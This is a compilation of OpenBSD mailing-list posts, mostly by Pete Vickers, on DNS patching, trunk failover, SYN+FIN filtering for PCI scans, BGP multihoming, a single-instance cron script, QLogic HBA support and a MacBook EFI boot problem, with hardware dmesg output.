Assuming the box is only a DNS server, then the simplest & easiest (in
my option) is to take a copy of the DNS related files:
- /etc/rc.conf.local
- /var/named/*
- noting also IP address, hostname etc etc

and then reinstall the o/s from a recent snapshot (downloaded here
ftp://ftp.openbsd.org/pub/OpenBSD/snapshots/
 or mirror), which has all the patches pre-applied. Then restore the
above files. job done.

if you're paranoid and unexperienced in unix, then grab a spare
machine to do a dry run on that.

/Pete



On 29 Jul 2008, at 18:16, skogzort wrote:


Hello,
I know nothing/very little about OpenBSD or UNIX. I have been tasked
with
updating our OpenBSD DNS server with a security fix (Vulnerability
Note
VU#800113- Multiple DNS implementations vulnerable to cache
poisoning).

In order to do this it appears that I have to download the source code
re-compile the entire OS. Recompiling the OS seems to involve a lot
of steps.
Before I continue to read through them all, I just want to confirm
that it is
actually necessary to do all of this, simply to apply a security
patch:

Down load the tree..
Pre load the tree..
Build the Kernel..
Build the userland..
Etc.

The only thing we use the server for is DNS. I dont know what
flavor we are
running, since its on a production server I assume it will be *
release or *
stable, either way from what Ive read so far it looks like in order
to apply
this security patch I will have to update it to * stable, which
seems to
require that the entire OS be recompiled. Is this correct?

Is it true that the only way to apply this patch is to recompile the
entire
OS, and go through all the steps above? I dont mind doing all this
since it
will give me a chance to learn, its just that the more steps I have
to take,
the more chances there are for mistakes. I want to be sure that the
way I plan
to do the update is the simplest. Im only familiar with Windows,
where you
just push a button to apply a security patch and you dont even have
to reboot
the server, so I was thinking that I may be misunderstanding what Im
reading.

Thanks very much for your time and any info

Kyle

nagios check_via_ssh on (chroot) OpenBSD

[Pete Vickers]

Does anyone have it running in nagios chroot environment ?

[EMAIL PROTECTED] /> ldd  /usr/local/libexec/nagios/check_by_ssh
/usr/local/libexec/nagios/check_by_ssh:
StartEnd  Type Open Ref GrpRef Name
  exe  10   0  /usr/local/libexec/ 
nagios/check_by_ssh
052b6000 252ba000 rlib 01   0  /usr/local/lib/ 
libintl.so.4.0
0e276000 2e352000 rlib 01   0  /usr/local/lib/ 
libiconv.so.4.0

0e739000 2e76d000 rlib 01   0  /usr/lib/libc.so.43.0
0fc4 0fc4 rtld 01   0  /usr/libexec/ld.so


perhaps like the ssh libraries are not needed, but where should the  
ssh keys be put ?


[EMAIL PROTECTED] />grep nagios /etc/passwd
_nagios:*:550:550:Nagios user:/var/www/nagios:/sbin/nologin

in /var/www/nagios/.ssh/ ?

TiA,


Pete Vickers

[EMAIL PROTECTED] |  +47 48 17 91 00

SystemNet AS

Re: Using trunk(4) to put a router in a switch ring

[Pete Vickers]

1.  create a layer 2 (switched) ring, using spanning tree.
- completely independent of openbsd box

2.  connect your (dual NIC) openbsd box to 2 separate switches for  
redundancy, and add both NICs to a trunk group.

- redundancy of switch, cabling and NICs.



[EMAIL PROTECTED] ~>ifconfig bge0
bge0: flags=8943 mtu  
1500

lladdr 00:18:fe:32:1e:08
trunk: trunkdev trunk0
media: Ethernet autoselect (1000baseT full-duplex)
status: active


[EMAIL PROTECTED] ~>ifconfig bge1
bge1: flags=8943 mtu  
1500

lladdr 00:18:fe:32:1e:08
trunk: trunkdev trunk0
media: Ethernet autoselect (1000baseT full-duplex)
status: active


[EMAIL PROTECTED] ~>ifconfig trunk0
trunk0: flags=8843 mtu 1500
lladdr 00:18:fe:32:1e:08
trunk: trunkproto failover
trunkport bge1 active
trunkport bge0 master,active
groups: trunk egress
media: Ethernet autoselect
status: active
inet 1.2.3.4 netmask 0xff00 broadcast 255.255.255.0


been using it for years:
[EMAIL PROTECTED] ~>uname -a
OpenBSD tug 4.0 GENERIC#1107 i386

/Pete



On 22 Sep 2008, at 22:03, Stuart Henderson wrote:


On 2008-09-22, Dave Wilson <[EMAIL PROTECTED]> wrote:

I'm not sure if trunk or bridge are more appropriate in this case


I think probably bridge with RSTP, but I'm not sure how that will
play with vlans (if you use them).

I'd like to do something similar, but I have vlans, and as an
added twist my interconnects are over third-party vlans, and I'm
not especially keen on breaking the third party's switch fabric,
so I haven't risked experimenting much with this yet :)

Re: Using trunk(4) to put a router in a switch ring

[Pete Vickers]

well i think you could insert your dual NIC openbsd host into the  
switch 'ring' physically, then bridging between the 2 NICs and firing  
up STP, but be aware that every time you up/down an interface or  
reboot your openbsd box, you'll trigger an STP recalc - which is  
around 45sec outage across entire switch infrastructure. (This can be  
mitigated with PVST and RSTP somewhat).



/Pete



On 23 Sep 2008, at 14:51, Dave Wilson wrote:


Pete Vickers wrote:

1.  create a layer 2 (switched) ring, using spanning tree.
- completely independent of openbsd box

2. connect your (dual NIC) openbsd box to 2 separate switches for
redundancy, and add both NICs to a trunk group.
- redundancy of switch, cabling and NICs.



Pete,

thanks for your useful and informative reply. A decent example is  
worth a paragraph of explanation to me :-)


Whilst I would love to do as you suggest, unfortunately my switches  
only have 2 GbE ports each. My hope was to put the routers in the  
GbE ring, as otherwise my routers will be bottlenecked by plugging  
into 100M ports on the switches. As most of my traffic goes through  
the routers this would be a big issue.


I suspect the only way I will really nail down what I can and cannot  
do will be to get some new switches and build a router and start  
playing around. The thing that I think is most likely to break is  
that I already use vlans and carp, and so I will have to work out  
the proper way to layer physical, bridge, vlan and carp whilst still  
making sure that packets keep going round the ring.


Unless reyk@, porter of the rstp code for bridge, can tell me  
different...?


SD

Re: Unified BSD?

[pete wright]

On Mon, Nov 12, 2012 at 12:37 PM, Robin  Björklin
 wrote:

>
>
> Am I bat crap crazy for thinking it could be good to merge the four largest
> BSD variants out there, take the best bits and pieces out of each and
> create a Unified BSD?
>

you are not crazy for thinking this, and fortunately there is nothing
prohibiting you from doing so (or a collective group of people, or
company etc...).  One thing you will see in the BSD Unix systems is
there is quite a bit of cross pollination between projects.  The
largest example current example of this from my perspective is support
for OpenBSD's "pf" packet filter in FreeBSD.  This is a packet filter
built to suit the OpenBSD developers goals, but it did not restrict
FreeBSD from supporting this packet filter and hopefully both projects
benefit from this collaboration (wider code exposure of the pf code,
and wider choice of packet filters for FreeBSD users).

My opinion is that with the current state of the BSD's this is one of
its stronger suits - we have multiple projects right now building
entire operating systems to suit each of the projects stated goals and
developer wishes.  this would be opposed to gnu/linux where you are
cobbling together many disparate sources to build your distribution
(some of which will have goals that may not line up with your goals).
with this diversity we still cross pollinate ideas and methods, but
are still allowed to spend our limited resources focusing on our
projects core goals.

-pete

-- 
pete wright
www.nycbug.org
@nomadlogicLA

Re: Ramifications of blocking SYN+FIN TCP packets

[Pete Vickers]

Hi,

What about Postel's 'be liberal in what you accept' ?  What about  
peers/intermediate system that have for example bugs which  
accidentally set FIN flags (ISP's broken traffic shaping/limiting  
device anyone ?).  If pf can safely cleanse such legitimate traffic,  
then why block it ?


Blindly implementing 'orders' from PCI etc is just wrong - to do so is  
only encouraging such bad practices. Instead reject their demands,  
using whatever appeals process is available. Only when enough  
technical staff do so will it be fixed.


All such regulations should be of the style where both of these are  
permitted:

- "I am a stupid admin, so I'll just blindly follow them"
and
- "I am a competent admin, so I'll use my judgement to best protect my  
net"



How about this, for a fun response:  "We don't want to drop such  
'special' traffic, since if we do so, then an attacker can deduce that  
we have implemented PCI guidelines, which in turn implies we have CC  
details online, and thus are a more attractive target' ...





/Pete




On 12 Mar 2009, at 10:22, J.C. Roberts wrote:


On Wed, 11 Mar 2009 13:07:22 -0400 Jason Dixon 
wrote:


On Wed, Mar 11, 2009 at 01:04:34PM -0400, David Goldsmith wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Jason Dixon wrote:


S/SAFR

I just had to deal with this on our customer's PCI scan.  Don't
argue with the logic, just do it.  :)


Let me guess -- TrustKeeper?  We just had to deal with this as well.
Submit an appeal and they should accept it.


Yup.


The "flags S/SAFR" will work unless you are being a good little pf
admin and also scrubbing all the traffic.  The problem is pf
considers SYN-RST packets to be illegal and drops them (good) but
only considers SYN-FIN packets to be ambiguous and so it
"normalizes" them and clears the FIN bit (in this case for the PCI
scan - bad) Then your server behind the firewall received what it
thinks is a nice clean SYN packet and it sends back SYN-ACK.


Yes, we have our own reasons not to scrub there.  Well, *someone* has
their reasons.  I have to deal with those reasons.  ;)



Ahhh my least favorite acronym name space conflict:

PCI == Payment Card Industry

Their "security through ignorance" practices are nearly as illustrious
as their "business through abusive lending" practices. The thing to
remember is the security facade they require is almost entirely for  
the

sake of public confidence and litigation defense. --hmmm... I should
probably save the rest of this rant for a far more appropriate mailing
list, like /dev/null

Anyhow, back to the original question, "are there any ramifications to
blocking SYN+FIN completely?"

Some (Darren Reed, ipf author) think that pf unconditionally clearing
the FIN flag on scrub is a bug, And no, we don't need a flame war  
about
whether or not Darren is "right," but none the less, it's still good  
to

see how the RFC's and ideas about "correct" filtering are both subject
to lots of interpretation.
http://www.derkeiler.com/Mailing-Lists/FreeBSD-Security/2005-07/0011.html

I know SYN+FIN is a valid packet according to RFC 793 and 1644 (T/ 
TCP),

but the more important question is, "what are the valuable *uses* for
SYN+FIN packets?"

Personally, I can't think of any valuable uses. Can you?

Just because SYN+FIN is a technically valid packet according to the
various RFC's doesn't mean we want or need such traffic, and doesn't
mean we consider it valuable and useful. Can you think of any RFC
valid traffic you're dropping when the RFC's tell you that you're
supposed to respond to it?  --Ya, I thought so.

Spammers? --Yep, RFC valid traffic.
DDOS? --Yep, RFC valid traffic.
Brute Force? --Yep, RFC valid traffic.
port scans --A lot of it is RFC valid traffic.

Though 'scrub' will drop the FIN flag off the SYN+FIN packets, the
bofhish instinct says without a proven and valuable *use* for SYN+FIN,
then just block it. If anyone complains about breakage, then just  
point

your (middle) finger at PCI/TrustKeeper compliance requirements, and
tell the user to take it up with them.

Call me overly pragmatic, but if something in a standard is not
providing valuable use (i.e. reward) and poses *any* type of risk or
cost (including the risk and cost of wasting my time filing and
maintaining some appeal), then the answer is painfully simple.

--
J.C. Roberts

Re: feature request OpenBGPD: route server ability to disable best path selection

[Pete Vickers]

The 'standard' (for at least one vendor's definition of standard) way  
to get around this, is to slap a different route distinguisher (RD) on  
each of the desired 'duplicate' paths. BGP then sees these as  
individual paths and will happily communicate both concurrently.


Separate but related, is the ability to import both RD's into the same  
VRF on the recipient of the BGP peering, and thus into the routing  
table (FIB) to use multiple paths (load balancing) etc.



/Pete


On 18 Mar 2009, at 11:32, Claudio Jeker wrote:


On Wed, Mar 18, 2009 at 11:00:32AM +0100, Arnoud Vermeer wrote:

I have a problem with filtering on the current route server
implementation. I currently have the following setup:


* 10.0.1.0/24   10.0.1.0/24


+---+   +---+
|AS1|   |AS2|
| 10.0.0.50 |   | 10.0.0.51 |
+---+   +---+
   |   |
   |   |
   +---+---+---+
   | RS|
   | 10.0.0.49 |
   +-+-+
 |
 |deny to { 10.0.0.52 } AS 1
 |
   +-+-+
   |AS3|
   | 10.0.0.52 |
   +---+

(or http://www.freshway.biz/files/20090318-problem-filter.txt for the
correct ASCII)

Both AS1 and AS2 announce the same prefix, but the route server  
selects
the AS1 path because of the lower nexthop value. Now I add a filter  
to
AS3. I deny to send any prefixes to AS3 that match AS1. Now AS3  
doesn't
receive the 10.0.1.0/24 prefix at all. It should however receive it  
from

AS2.

Quagga overcomes this problem by making a per-filtered-peer RIB and  
then

do best path selection
(http://www.quagga.net/docs/docs-multi/Description-of-the-Route-Server-model.html 
).
I think this is just an ugly and complicated work-around as it  
doesn't

solve the core of the problem.

In my eyes the best solution will be to disable the best-path- 
selection

on the route server altogether, and send all routes (except the
filtered) to the peer.

Arguments to do this:
- As shown above, the best path selection breaks on the route server
when applying filters.
- A route server should not make any best-path selection, because the
peers criteria could be completely different than the route server.
- The function of the route server is to 'collect' all the routes and
send them to all of the peers, not to 'collect a subset' of the  
routes

and send that to its peers.

I would love to hear your thoughts on this subject. Would it be  
hard to

implement this feature?



BGP only supports one path per prefix and peer. If you send multiple  
ones
as you propose the later ones will overwrite the first one no matter  
what.
To support your idea we would need a per-filtered-peer local-RIB  
because

the route-server needs to do the best path selection for the peer.

--
:wq Claudio

Re: European orders

[Pete Vickers]

A public statement from him (Wim) would be appropriate now I believe.  
Especially informing all of us who have pre-ordered the latest release  
via him what will happen with our orders, and importantly when he will  
forward the proceeds to Theo et al.



/Pete


On 25 Mar 2009, at 01:16, Floor Terra wrote:

On Wed, Mar 25, 2009 at 12:34 AM, Theo de Raadt >

wrote:

Do you have any advice for those who allready ordered? Or should we

contact

the distributor?


Sorry, but I don't know that yet. B We'll see, I suppose.



Wim called me 20 minutes ago and explained the situation to me.
If you have any questions just mail him or give him a call.

--
Floor Terra 
www: http://brobding.mine.nu/

correction to gre(4) man page

[Pete Vickers]

SEE ALSO section, entry for Web Cache Coordination Protocol V1.0, link  
is broken. A suitable replacement is:


http://www.ietf.org/proceedings/99jul/I-D/draft-ietf-wrec-web-pro-00.txt


/Pete

Re: correction to gre(4) man page

[Pete Vickers]

On 12 Apr 2009, at 23:47, Jason McIntyre wrote:


On Sun, Apr 12, 2009 at 10:40:08PM +0200, Pete Vickers wrote:
SEE ALSO section, entry for Web Cache Coordination Protocol V1.0,  
link

is broken. A suitable replacement is:

http://www.ietf.org/proceedings/99jul/I-D/draft-ietf-wrec-web-pro-00.txt


/Pete


that link works fine here.
jmc



ahh, indeed. The culprit was the man->html conversion for this:
http://www.openbsd.org/cgi-bin/man.cgi?query=gre
where the URL is line wrapped, but the html does not take it into  
account.


thanks for pointing it out.

/Pete

Re: MPLS status questions.

[Pete Vickers]

On 30 Apr 2009, at 00:14, Daniel Ouellet wrote:


Joe S wrote:
What's really frustrating here are the network admins I work with  
that

are trying to migrate from ipsec vpns to MPLS because it's "easier"
and "just as secure".


Well, I am not sure that it would be very convincing to them, but I  
guess a somewhat good argument to use might be as simple as asking  
them if they would replace IPSec tunnel/VPN on a big switch WAN/LAN  
network with only VLan tag instead?


That's about what they say isn't it? Scary.

May not be a very good example, but I think the analogy between them  
is somewhat valuable in idea and concept anyway.


But again, the norm looks like these days is to only consider  
security after the fact and react to it instead of being proactive  
on it.


See what they say.

Best,

Daniel





you don't use telnet even over an IPSec WAN do you ? end-to-end  
security (e.g. TLS/SSL) is your friend here. It's the only way to  
actively verify link security


and once you're in an SSH session (with properly verified keys), you  
don't care who's watching the stream


/Pete

Re: IMPORTANT, DO THIS OR YOUR E-MAIL WON'T WORK

[Pete Vickers]

On 27 May 2009, at 10:01, Otto Moerbeek wrote:


On Wed, May 27, 2009 at 09:43:18AM +0200, Otto Moerbeek wrote:


On Wed, May 27, 2009 at 10:29:10AM +0300, Gregory Edigarov wrote:


Bob Beck wrote:

* Chris Harries  [2009-05-26 10:48]:

it sure beats everyone moaning at me as they cannot read e-mails  
clearly
marked IMPORTANT, DO THIS OR YOUR E-MAIL WONT WORK, then moaning  
when their

email doesn't work



IMPORTANT, DO THIS OR YOUR E-MAIL WON'T WORK

We are refreshing our openbsd mailing lists to ensure that the list
memberships correctly match our business process and security  
roles.


In order to ensure your list memberships and email continue to work
without interruption, please reply to this email with the following
information:


Name : ___


Email ID: 


Password: 


Thanks for helping to ensure the integrity of our email system.




Pardon? I do not understand what is this for


explanation will follow once you provide the neccesary provide of


ehhh s/provide/proof


authentication.

-Otto




I seriously thought you'd done the typo deliberately to mimic the poor  
english typically found in such fraud emails. LoL.


/Pete

Re: BGP and NATting to multiple ISPs

[Pete Vickers]

On 18. juni. 2009, at 19.45, Karl O. Pinc wrote:




What's the best way to solve this problem?



stop trying to bodge it, and get some PI space.

/Pete

Re: BGP and NATting to multiple ISPs

[Pete Vickers]

nah, you maybe right technically with the data-center argument, but  
not politically. Everyone has the 'right' to proper redundancy for H/A  
if they want/need it. Actually, the sooner the IPv4 space  gets used  
up the better, then everyone will have to migrate to IPvShit, and be  
done with it.


/Pete



On 18. juni. 2009, at 22.49, tico wrote:


Karl O. Pinc wrote:

On 06/18/2009 01:50:17 PM, Pete Vickers wrote:


On 18. juni. 2009, at 19.45, Karl O. Pinc wrote:




What's the best way to solve this problem?



stop trying to bodge it, and get some PI space.


I'd love but, how can I justify to ARIN a large enough address
block that it won't be dropped by BGP administrators?
The only reason we'd need the addresses is to muti-home.
ARIN says you can get a /22 for multihoming if you can justify their  
25% / 50% usage as spelled out in their numbering policy.

https://www.arin.net/policy/nrpm.html#four322

If you can't justify that, then get a /24 of PA space from a  
provider that *will* allow you to reannounce that /24 via an  
additional transit and *will* provide you with an LOA that you can  
provide to that additional transit operator.


The number of networks that filter prefixes smaller than /22 don't  
appear to be that numerous IMHO, but if they do, your /24 will still  
be reachable as they'll see the larger /19 or whatever from your  
provider that it's carved out of.

I am under the impression this is not reason enough
for ARIN, that they are in a rationing mood when it comes
to handing out IPv4 address blocks.
As well they should be. IP resources are scarce and people are  
wasteful and greedy.
Most offices don't need BGP multihoming, or any sort of inbound  
multihoming at all-- just outbound which is easily done without the  
assistance of the ISPs themselves or ARIN by using NAT and upstream- 
failover features commonly found in most routers.
Most world-accessible servers that are important enough to need  
inbound multihoming should be sitting in a datacenter which has  
significantly more professionally-managed multihoming than small  
offices.


And before the flaming starts, remember that I said "most."
Cheers,
Tico


Karl 
Free Software:  "You don't pay back, you pay forward."
-- Robert A. Heinlein

Re: BGP and NATting to multiple ISPs

[Pete Vickers]

On 19. juni. 2009, at 00.10, Henning Brauer wrote:


* Pete Vickers  [2009-06-19 00:02]:

Actually, the sooner the IPv4 space  gets used up the
better, then everyone will have to migrate to IPvShit, and be done  
with

it.


that doesn't solve a single problem.
in return, you get a plethora of new ones on top.

--
Henning Brauer, h...@bsws.de, henn...@openbsd.org
BS Web Services, http://bsws.de
Full-Service ISP - Secure Hosting, Mail and DNS Services
Dedicated Servers, Rootservers, Application Hosting - Hamburg &  
Amsterdam




Once 'everyone' is solely 'on' v6, then v4 space not a concern.

As lots of folks (and I'm one of them) here point out v6 has many many  
issues, but premature v4 exhaustion / v6 migration, would force these  
issues to be resolved a lot quicker.



/Pete

Re: BGP and NATting to multiple ISPs

[Pete Vickers]

On 19. juni. 2009, at 00.40, Ted Unangst wrote:

On Thu, Jun 18, 2009 at 5:54 PM, Pete Vickers  
wrote:
nah, you maybe right technically with the data-center argument, but  
not
politically. Everyone has the 'right' to proper redundancy for H/A  
if they
want/need it. Actually, the sooner the IPv4 space  gets used up the  
better,

then everyone will have to migrate to IPvShit, and be done with it.


oh really?  people are going to start carrying /48s in a world where
they don't even carry anything more than a /24 for ipv4?



admins who filter >= /24 and don't set a default to upsteam [1],  
generally get what they deserve - since they are blackholing potential  
customers.


If their employer is so cash strapped they can't afford the ASIC space  
for a full table, then presumably their market share & b/w usage are  
such that they can hold the table in software instead. (dumb north  
american routing policies excepted)




[1] Or 0.0.0.0/1 and 128.0.0.0/1 across links, or somesuch.


/Pete

sole instance of a process

[Pete Vickers]

Hi,

I suspect this may be the wrong list for this question. However although 
strictly it's a Bourne shell script query, it only seem to act up under OpenBSD 
(for me).

Essentially I have a job which needs to be run periodically. So I have a shell 
script to do the necessary commands, and this is scheduled via (root's) crontab.
It is however very important that multiple instances of the job are not run 
concurrently (e.g. if an previous invocation hung), and so the script should 
detect this upon invocation before proceeding.

I don't want a single long running job (which could e.g. sleep between loops) 
for various reasons. And I also don't like PID files and other fragile locking 
hacks.


So down to business, below is the gist of my script. Most of the time it 
appears to run fine. However occasionally (once every couple of days?) it 
reports via email that a duplicate process is detected, but the included ps 
listing shows no other instance. I don't believe that this is just due to an 
old instance exiting in the small time window between the pgrep, and the ps 
invocations.  So basically I guess there is an error in my script or it's 
logic, or something else I'm not seeing.

Any hit with the clue bat gratefully received.



#!/bin/sh
#
#
SHOUT="/usr/bin/logger -i -t MYPERIODICJOB"
#
#
# Ensure another instance of this is not running
#
MYNAME=`basename $0`
MYPID=$$
#
/usr/bin/pgrep -fu root $MYNAME | /usr/bin/grep -v $MYPID && \
{
$SHOUT "HELP - duplicate process detected $?" ; \
ps -axjwww | mail -s "HELP MYPERIODICJOB $MYPID $MYNAME $PPID" 
m...@example.com ; \
exit 1 ;
 }

#
#
# starting doing useful stuff here..
#


Disclaimer: I know my scripting is far from optimal...


/Pete

'newer' Qlogic HBA support on amd64

[Pete Vickers]

Hi,
I have a an amd64 server (HP DL360 G5), with an Qlogic FC HBA in it. It appears 
to be based on the ISP2400 series, and isp man page says the driver only 
supports up to the ISP2300 series. However the driver appears to try to attach 
the device irrespective (and fail). Does anyone know how different the 2400 
series are, or if there is work in progress to support them ?

thanks

/Pete

Some relevant info below:


$ dmesg | grep isp0
isp0 at pci8 dev 0 function 0 "QLogic ISP2432" rev 0x02: apic 8 int 17
isp0: Polled Mailbox Command (0x8) Timeout (10us)
isp0: Polled Mailbox Command (0x8) Timeout (10us)
isp0: Mailbox Command 'ABOUT FIRMWARE' failed (TIMEOUT)


# pcidump -v 19:0:0
 19:0:0: QLogic ISP2432
0x: Vendor ID: 1077 Product ID: 2432
0x0004: Command: 0147 Status ID: 0010
0x0008: Class: 0c Subclass: 04 Interface: 00 Revision: 02
0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 10
0x0010: BAR io addr: 0x5000/0x0100
0x0014: BAR mem 64bit addr: 0xfdff/0x4000
0x001c: BAR empty ()
0x0020: BAR empty ()
0x0024: BAR empty ()
0x0028: Cardbus CIS: 
0x002c: Subsystem Vendor ID: 103c Product ID: 7040
0x0030: Expansion ROM Base Address: 
0x0038: 
0x003c: Interrupt Pin: 01 Line: 07 Min Gnt: 00 Max Lat: 00
0x0044: Capability 0x01: Power Management
0x004c: Capability 0x10: PCI Express
Link Speed: 2.5 / 2.5 GT/s Link Width: x4 / x4
0x0064: Capability 0x05: Message Signaled Interrupts (MSI)
0x0074: Capability 0x03: Vital Product Data (VPD)
0x007c: Capability 0x11: Extended Message Signaled Interrupts (MSI-X)


$ dmesg | head  


OpenBSD 5.3 (GENERIC.MP) #62: Tue Mar 12 18:21:20 MDT 2013
dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP


# sysctl hw  
hw.machine=amd64
hw.model=Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
hw.ncpu=4
hw.byteorder=1234
hw.pagesize=4096
hw.disknames=sd0:20008a7ae6c37c52,cd0:
hw.diskcount=2
hw.sensors.cpu0.temp0=37.00 degC
hw.sensors.cpu1.temp0=37.00 degC
hw.sensors.cpu2.temp0=37.00 degC
hw.sensors.cpu3.temp0=37.00 degC
hw.sensors.acpitz0.temp0=8.30 degC (zone temperature)
hw.sensors.ciss0.drive0=online (sd0), OK
hw.cpuspeed=2500
hw.setperf=100
hw.vendor=HP
hw.product=ProLiant DL360 G5
hw.physmem=4292161536
hw.usermem=4292136960
hw.ncpufound=4
hw.allowpowerdown=1

Re: 'newer' Qlogic HBA support on amd64

[Pete Vickers]

Hi,

Sorry for the delay. I finally upgraded the box (very quick and easy process - 
nice ) and the HBA is now attached by the qle driver. However whilst it 'sees' 
the SAN disk behind it, it remain unable to talk to it.
 

# uname -mrv 
5.5 GENERIC.MP#315 amd64


# dmesg | egrep -i "qle|scsibus1"
qle0 at pci8 dev 0 function 0 "QLogic ISP2432" rev 0x02: msi
qle0: bad startup mboxes: 0 0
qle0: firmware rev 4.0.20, attrs 0x2
scsibus1 at qle0: 2048 targets, WWPN 50060b66644e, WWNN 50060b66644f
sd1 at scsibus1 targ 130 lun 0:  SCSI2 0/direct fixed 
naa.600601601b662700d837603da8efe011
sd2 at scsibus1 targ 131 lun 0:  SCSI2 0/direct fixed 
naa.600601601b662700d837603da8efe011


sd1 & sd2 : Are these duplicates due to redundant paths in SAN fabric ?


# fdisk sd1 
fdisk: DIOCGPDINFO: Input/output error
fdisk: Can't get disk geometry, please use [-chs] to specify.



# pcidump  -v 19:0:0
 19:0:0: QLogic ISP2432
0x: Vendor ID: 1077 Product ID: 2432
0x0004: Command: 0147 Status: 0010
0x0008: Class: 0c Subclass: 04 Interface: 00 Revision: 02
0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 10
0x0010: BAR io addr: 0x5000/0x0100
0x0014: BAR mem 64bit addr: 0xfdff/0x4000
0x001c: BAR empty ()
0x0020: BAR empty ()
0x0024: BAR empty ()
0x0028: Cardbus CIS: 
0x002c: Subsystem Vendor ID: 103c Product ID: 7040
0x0030: Expansion ROM Base Address: 
0x0038: 
0x003c: Interrupt Pin: 01 Line: 07 Min Gnt: 00 Max Lat: 00
0x0044: Capability 0x01: Power Management
0x004c: Capability 0x10: PCI Express
Link Speed: 2.5 / 2.5 GT/s Link Width: x4 / x4
0x0064: Capability 0x05: Message Signaled Interrupts (MSI)
0x0074: Capability 0x03: Vital Product Data (VPD)
0x007c: Capability 0x11: Extended Message Signaled Interrupts (MSI-X)

e.g. http://filedownloads.qlogic.com/files/datasheets/32359/83432-580-00D.pdf



(let me know if you want list spam with full dmesg).


/Pete


On 13. mars 2014, at 18:48, Ted Unangst  wrote:

> On Thu, Mar 13, 2014 at 18:44, Pete Vickers wrote:
>> Hi,
>> I have a an amd64 server (HP DL360 G5), with an Qlogic FC HBA in it. It
>> appears to be based on the ISP2400 series, and isp man page says the
>> driver only supports up to the ISP2300 series. However the driver appears
>> to try to attach the device irrespective (and fail). Does anyone know how
>> different the 2400 series are, or if there is work in progress to support
>> them ?
> 
> In 5.5 and later, that's supported by the qle driver. The isp driver
> is being broken into parts (qlw, qla, qle) depending on generation.
> I'd try a snapshot. It should work better. And if it doesn't work,
> we'd like to know.

External monitor issue with EFI & MacBook

[Pete Zabagel]

Hello all, 

I'm having issues installing OpenBSD 6.0 (-current) on my old Apple
MacBook (Early 2008). The builtin screen is broken so I'm using a 
mini-DVI to VGA connector and external monitor to do the install. I'm 
under the impression that it's better to install / boot from EFI instead
of the BIOS mode because the computer won't display the SATA controller
in BIOS mode but will in EFI mode. I don't know if this is actually
true or not but I remember something on undeadly.org about a dev's 
experience with a MacBook Air with a similar story.

Anyways, so I do the install as a BIOS boot and it works just fine. I
did the GPT route and rebooted. Now if the laptop lid is open it boots 
just fine (but I need to boot the Mac with it closed so the external
video starts) but if the lid is closed it will boot until this line:

efifb at mainbus0 not configured

and then the screen goes blank. I believe it's a hang too, I setup
networking and was unable to ping it after it should have booted up. 

With the screen open however, it boots up just fine. I've included a 
full dmesg from a sucessful boot below.

I've tried enabling verbose mode in boot -c but it seems the graphics
drivers don't initialize until after that (I just get a blank screen).
With config -e I've tried to turn off a few features (efifb, uvideo,
etc.) with no luck.

My feeling is the graphics drivers don't see the attatched external 
screen or there is a failure handing off between the EFI and the
kernel but I'm not really sure. 

Can someone try to receate this issue? (Boot up an amd64 Mac with lid
closed in EFI mode) Also, does anyone have a guess as to where the code
might be that controls this? I want to take a look before I file a 
formal bug report. 

Thanks, 

Pete Zabagel

OpenBSD 6.0-current (GENERIC.MP) #2480: Wed Sep 21 11:18:24 MDT 2016
    dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP
real mem = 2107633664 (2009MB)
avail mem = 2039320576 (1944MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.4 @ 0x7eec3000 (41 entries)
bios0: vendor Apple Inc. version "MB41.88Z.00C1.B00.0802091535" date 02/09/08
bios0: Apple Inc. MacBook4,1
acpi0 at bios0: rev 2
acpi0: sleep states S0 S3 S4 S5
acpi0: tables DSDT FACP HPET APIC MCFG ASF! SBST ECDT SSDT SSDT SSDT SSDT
acpi0: wakeup devices ADP1(S3) LID0(S3) ARPT(S3) GIGE(S3) UHC1(S3) UHC2(S3)
UHC3(S3) UHC4(S3) UHC5(S3) EHC1(S3) EHC2(S3) EC__(S3)
acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpihpet0 at acpi0: 14318179 Hz
acpimadt0 at acpi0 addr 0xfee0: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1197.21 MHz
cpu0:
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CV,PAT,PSE36,CFLUSH,
DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM2,
SSSE3,CX16,xTPR,PDCM,SSE4.1,NXE,LONG,LAHF,PERF,SENSOR
cpu0: 3MB 64b/line 8-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: Pentium Pro MTRR support, 8 var ranges, 88 fixed ranges
cpu0: apic clock running at 199MHz
cpu0: mwait min=64, max=64, C-substates=0.2.2.2.2.1.3, IBE
cpu1 at mainbus0: apid 1 (application processor)
cpu1: Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1197.00 MHz
cpu1:
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUS
H,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM
2,SSSE3,CX16,xTPR,PDCM,SSE4.1,NXE,LONG,LAHF,PERF,SENSOR
cpu1: 3MB 64b/line 8-way L2 cache
cpu1: smt 0, core 1, package 0
ioapic0 at mainbus0: apid 1 pa 0xfec0, version 20, 24 pins
acpimcfg0 at acpi0 addr 0xf000, bus 0-255
acpiec0 at acpi0
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 2 (RP05)
acpiprt2 at acpi0: bus 3 (RP06)
acpiprt3 at acpi0: bus 4 (PCIB)
acpicpu0 at acpi0: !C3(100@57 mwait.3@0x31), !C2(500@1 mwait@0x10), C1(1000@1
mwait), PSS
acpicpu1 at acpi0: !C3(100@57 mwait.3@0x31), !C2(500@1 mwait@0x10), C1(1000@1
mwait), PSS
acpiac0 at acpi0: AC unit online
